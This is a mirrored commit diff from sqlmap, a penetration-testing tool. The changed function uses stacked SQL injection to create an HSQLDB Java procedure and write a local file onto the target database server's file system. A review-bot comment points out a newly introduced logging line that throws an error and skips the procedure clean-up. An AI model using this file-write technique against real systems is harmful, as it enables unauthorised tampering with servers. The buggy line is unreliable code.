mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2024-11-25 19:13:48 +03:00
Trivial refactoring for #4379
parent
babe52eb10
commit
0585a55ee0
|
@ -18,7 +18,7 @@ from lib.core.enums import OS
|
||||||
from thirdparty.six import unichr as _unichr
|
from thirdparty.six import unichr as _unichr
|
||||||
|
|
||||||
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
|
||||||
VERSION = "1.4.10.4"
|
VERSION = "1.4.10.5"
|
||||||
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
|
||||||
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
|
||||||
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
|
||||||
|
|
|
@ -21,26 +21,23 @@ class Filesystem(GenericFilesystem):
|
||||||
|
|
||||||
@stackedmethod
|
@stackedmethod
|
||||||
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
def stackedWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
|
||||||
|
|
||||||
funcName = randomStr()
|
funcName = randomStr()
|
||||||
MAX_BYTES = 2 ** 20
|
max_bytes = 1024 * 1024
|
||||||
|
|
||||||
debugMsg = "creating a Java Language Procedure '%s'" % funcName
|
debugMsg = "creating JLP procedure '%s'" % funcName
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, MAX_BYTES)
|
addFuncQuery = "CREATE PROCEDURE %s (IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(%s)) " % (funcName, max_bytes)
|
||||||
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
addFuncQuery += "LANGUAGE JAVA DETERMINISTIC NO SQL "
|
||||||
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
addFuncQuery += "EXTERNAL NAME 'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'"
|
||||||
inject.goStacked(addFuncQuery)
|
inject.goStacked(addFuncQuery)
|
||||||
|
|
||||||
logger.debug("encoding file to its hexadecimal string value")
|
|
||||||
|
|
||||||
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
fcEncodedList = self.fileEncode(localFile, "hex", True)
|
||||||
fcEncodedStr = fcEncodedList[0][2:]
|
fcEncodedStr = fcEncodedList[0][2:]
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
warnMsg = "the injection is on a GET parameter and the file "
|
warnMsg = "as the injection is on a GET parameter and the file "
|
||||||
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
warnMsg += "bytes, this might cause errors in the file "
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
|
@ -49,15 +46,14 @@ class Filesystem(GenericFilesystem):
|
||||||
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
debugMsg = "exporting the %s file content to file '%s'" % (fileType, remoteFile)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
# http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
# Reference: http://hsqldb.org/doc/guide/sqlroutines-chapt.html#src_jrt_procedures
|
||||||
invokeQuery = "call %s('%s', cast ('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, MAX_BYTES)
|
invokeQuery = "CALL %s('%s', CAST('%s' AS VARBINARY(%s)))" % (funcName, remoteFile, fcEncodedStr, max_bytes)
|
||||||
inject.goStacked(invokeQuery)
|
inject.goStacked(invokeQuery)
|
||||||
|
|
||||||
logger.debug("removing procedure %s from DB" % funcName)
|
logger.debug("cleaning up" % funcName)
|
||||||
delQuery = "DELETE PROCEDURE " + funcName
|
delQuery = "DELETE PROCEDURE %s" % funcName
|
||||||
inject.goStacked(delQuery)
|
inject.goStacked(delQuery)
|
||||||
|
|
||||||
message = "the local file '%s' has been successfully written on the back-end DBMS" % localFile
|
message = "the local file '%s' has been written on the back-end DBMS" % localFile
|
||||||
message += "file system ('%s')" % remoteFile
|
message += "file system ('%s')" % remoteFile
|
||||||
logger.info(message)
|
logger.info(message)
|
||||||
|
|
||||||
|
|
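Review bot: The new debug line `logger.debug("cleaning up" % funcName)` in the second hunk applies `%` to a format string that has no placeholder, so (assuming `randomStr()` returns a string) it raises `TypeError: not all arguments converted during string formatting` as soon as it is reached. It sits between the `CALL` and the `DELETE PROCEDURE` statement, so the exception would skip the clean-up and leave the randomly named procedure defined on the tested database, and the final info message would never be logged. Either drop the argument, `logger.debug("cleaning up")`, or keep the name in the message, `logger.debug("cleaning up procedure '%s'" % funcName)`. Separately, the success message joins `"... written on the back-end DBMS"` and `"file system ('%s')"` without a space between them; a trailing space on the first literal fixes it. The body of stackedWriteFile continues between the two hunks, outside the visible lines.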
|
@ -96,7 +96,7 @@ class Filesystem(GenericFilesystem):
|
||||||
fcEncodedStrLen = len(fcEncodedStr)
|
fcEncodedStrLen = len(fcEncodedStr)
|
||||||
|
|
||||||
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
if kb.injection.place == PLACE.GET and fcEncodedStrLen > 8000:
|
||||||
warnMsg = "the injection is on a GET parameter and the file "
|
warnMsg = "as the injection is on a GET parameter and the file "
|
||||||
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
warnMsg += "to be written hexadecimal value is %d " % fcEncodedStrLen
|
||||||
warnMsg += "bytes, this might cause errors in the file "
|
warnMsg += "bytes, this might cause errors in the file "
|
||||||
warnMsg += "writing process"
|
warnMsg += "writing process"
|
||||||
|
|